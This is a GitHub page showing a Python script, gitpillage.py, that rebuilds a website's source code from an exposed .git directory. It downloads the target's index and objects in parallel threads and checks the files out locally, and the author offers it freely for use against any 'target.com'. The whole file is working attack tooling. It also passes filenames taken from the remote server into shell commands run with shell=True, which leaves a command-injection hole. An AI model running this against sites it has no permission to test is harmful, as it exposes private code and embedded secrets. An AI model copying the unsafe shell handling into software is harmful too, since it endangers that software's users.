Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
executable file 241 lines (191 sloc) 6.33 KB
#!/usr/bin/python3.5
# inspired by https://github.com/koto/gitpillage/blob/master/gitpillage.sh
# example: python3.5 gitpillage.py -u https://www.example.com -t 10
# I don't believe in license.
# You can do whatever you want with this program.
#
### functions
#
def downloadFile( url ):
try:
r = requests.get( url, timeout=3 )
return r
except Exception as e:
sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
return False
def downloadOject( t_extension, t_exclude, file ):
sys.stdout.write( 'progress: %d/%d\r' % (t_multiproc['n_current'],t_multiproc['n_total']) )
t_multiproc['n_current'] = t_multiproc['n_current'] + 1
file = file.strip()
if not len(file):
return False
# 0: object_id , 1: real filename
tmp = file.split(':')
object_id = tmp[0]
real_filename = tmp[1]
ext = real_filename.split('.')[-1]
# print(ext)
# make the test easier to read/understand
if len(t_extension):
if ext in t_extension:
go = True
else:
go = False
if len(t_exclude):
if ext in t_exclude:
go = False
else:
go = True
if not go:
if t_multiproc['verbose']:
sys.stdout.write( "%s[*] skip extension: %s%s\n" % (fg('dark_gray'),real_filename,attr(0)) )
return False
u = git_url + '/objects/' + object_id[0:2] + '/' + object_id[2:]
# print(u)
r = downloadFile( u )
if type(r) is bool:
if t_multiproc['verbose']:
sys.stdout.write( "%s[-] %s%s\n" % (fg('dark_gray'),u,attr(0)) )
return False
if not r.status_code == 200:
if t_multiproc['verbose']:
sys.stdout.write( "%s[-] %s (%d)%s\n" % (fg('dark_gray'),u,r.status_code,attr(0)) )
return False
filename = saveObject( output_dir, object_id, r.content )
real_filename = output_dir + '/' + real_filename
try:
cmd = 'cd ' + output_dir + '; git checkout ' + tmp[1]
output = subprocess.check_output( cmd, stderr=subprocess.STDOUT, shell=True ).decode('utf-8')
t_multiproc['n_success'] = t_multiproc['n_success'] + 1
display = "[+] %s (%d) %s-> %s (%d)%s\n" % (u,r.status_code,fg('cyan'),real_filename,len(r.content),attr(0))
except Exception as e:
if t_multiproc['verbose']:
display = "[-] %s (%d) %s-> %s%s\n" % (u,r.status_code,fg('yellow'),e,attr(0))
return False
sys.stdout.write( display )
def saveObject( output_dir, object_id, content ):
dirname = output_dir + '/.git/objects/'+ object_id[0:2]
filename = dirname + '/' + object_id[2:]
# print(filename)
if not os.path.isdir(dirname):
try:
os.makedirs( dirname )
except Exception as e:
sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
return False
fp = open( filename, 'wb')
fp.write( content )
fp.close()
return filename
#
###
#
import os
import sys
import argparse
import requests
import subprocess
from functools import partial
from urllib.parse import urlparse
from colored import fg, bg, attr
from multiprocessing.dummy import Pool
#
### variables
#
max_threads = 5
t_extension = []
t_exclude = ['png','gif','jpg','jpeg','ico','svg','eot','otf','ttf','woff','woff2','css','sass','less','po','mo','mp3','mp4','mpeg','avi']
parser = argparse.ArgumentParser()
parser.add_argument( "-u","--url",help="url of the .git, example https://www.target.com/.git" )
parser.add_argument( "-t","--threads",help="threads, default: 5" )
parser.add_argument( "-e","--extension",help="extensions to download separated by comma, overwrite --exclude, default: all but default exclude" )
parser.add_argument( "-x","--exclude",help="extensions to exclude separated by comma, default: "+','.join(t_exclude) )
parser.add_argument( "-v","--verbose",help="verbose mode, default: off", action="store_true" )
parser.parse_args()
args = parser.parse_args()
if args.url:
url = args.url
# url = args.url.strip('/')
else:
parser.error( 'url list missing' )
if args.threads:
max_threads = int(args.threads)
if args.exclude:
t_extension = []
t_exclude = args.exclude.split(',')
if args.extension:
t_extension = args.extension.split(',')
t_exclude = []
if not url.startswith( 'http' ):
url = 'https://'+url
if args.verbose:
verbose = True
else:
verbose = False
git_url = url
t_url_parse = urlparse( url )
output_dir = os.getcwd() + '/' + t_url_parse.netloc
#
###
#
#
### init
#
if not os.path.isdir(output_dir):
try:
os.makedirs( output_dir )
except Exception as e:
sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
exit()
sys.stdout.write( "%s[+] output directory: %s%s\n" % (fg('green'),output_dir,attr(0)) )
try:
cmd = 'cd ' + output_dir + '; git init'
output = subprocess.check_output( cmd, stderr=subprocess.STDOUT, shell=True ).decode('utf-8')
sys.stdout.write( "[+] %s\n" % output.strip() )
except Exception as e:
sys.stdout.write( "%s[-] error occurred, cannot initialize repository%s\n" % (fg('red'),attr(0)) )
sys.stdout.write( "%s[-] %s%s\n" % (fg('red'),e,attr(0)) )
exit()
#
###
#
#
### create local repository
#
u = git_url + '/index'
r = downloadFile( u )
if not r:
sys.stdout.write( "%s[-] cannot find index file: %s%s\n" % (fg('red'),u,attr(0)) )
exit()
sys.stdout.write( "%s[+] index file found: %s%s\n" % (fg('green'),u,attr(0)) )
fp = open( output_dir+'/.git/index', 'wb' )
fp.write( r.content )
fp.close()
try:
cmd = 'cd ' + output_dir + '; git ls-files --stage | awk \'{print $2":"$4}\''
output = subprocess.check_output( cmd, stderr=subprocess.STDOUT, shell=True ).decode('utf-8')
t_ls_files = output.split("\n")
except Exception as e:
sys.stdout.write( "%s[-] error occurred, cannot initialize repository%s\n" % (fg('red'),attr(0)) )
sys.stdout.write( "%s[-] %s%s\n" % (fg('red'),e,attr(0)) )
exit()
#
###
#
#
### main loop
#
t_multiproc = {
'n_current': 0,
'n_total': len(t_ls_files),
'n_success': 0,
'verbose': verbose,
}
pool = Pool( max_threads )
pool.map( partial(downloadOject,t_extension,t_exclude), t_ls_files )
pool.close()
pool.join()
#
###
#
sys.stdout.write( "%s[+] %d files successfully downloaded%s\n" % (fg('green'),t_multiproc['n_success'],attr(0)) )
You can’t perform that action at this time.